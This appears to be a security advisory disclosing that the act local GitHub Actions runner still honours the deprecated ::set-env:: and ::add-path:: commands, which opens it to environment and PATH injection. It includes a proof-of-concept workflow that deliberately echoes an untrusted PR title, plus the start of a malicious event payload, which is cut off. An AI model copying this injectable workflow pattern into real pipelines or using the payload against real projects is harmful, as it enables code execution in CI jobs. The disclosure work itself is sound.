act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which GitHub Actions disabled in October 2020 (CVE-2020-15228, GHSA-mfwh-5m23-j46w) due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This makes act strictly less secure than GitHub Actions for the same workflow file.
pkg/runner/command.go, lines 52-58:
switch command {
case "set-env":
rc.setEnv(ctx, kvPairs, arg)
case "set-output":
rc.setOutput(ctx, kvPairs, arg)
case "add-path":
rc.addPath(ctx, arg)
There is no check for the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable. The string ACTIONS_ALLOW_UNSECURE_COMMANDS does not appear anywhere in the act codebase.
On GitHub Actions, these commands are rejected unless ACTIONS_ALLOW_UNSECURE_COMMANDS=true is set:
Error: The `set-env` command is disabled. Please upgrade to using Environment Files
or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true.
Tested on: act 0.2.84, Docker Desktop 29.1.2, macOS Darwin 24.5.0
Step 1 — Create a workflow that logs PR metadata:
.github/workflows/vuln.yml:
name: Vulnerable Workflow
on: [pull_request]
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Log PR info
run: |
echo "Processing PR: ${{ github.event.pull_request.title }}"
- name: Subsequent step - check environment
run: |
echo "=== Environment Injection Check ==="
echo "NODE_OPTIONS=$NODE_OPTIONS"
echo "EVIL_VAR=$EVIL_VAR"
echo "PATH=$PATH"
Step 2 — Create a malicious event payload:
event.json:
{
"pull_request": {
"title": "Fix typo\n::set-env...
0.2.86Exploitability
AV:NAC:LAT:PPR:NUI:PVulnerable System
VC:HVI:HVA:HSubsequent System
SC:NSI:NSA:N7.7/CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N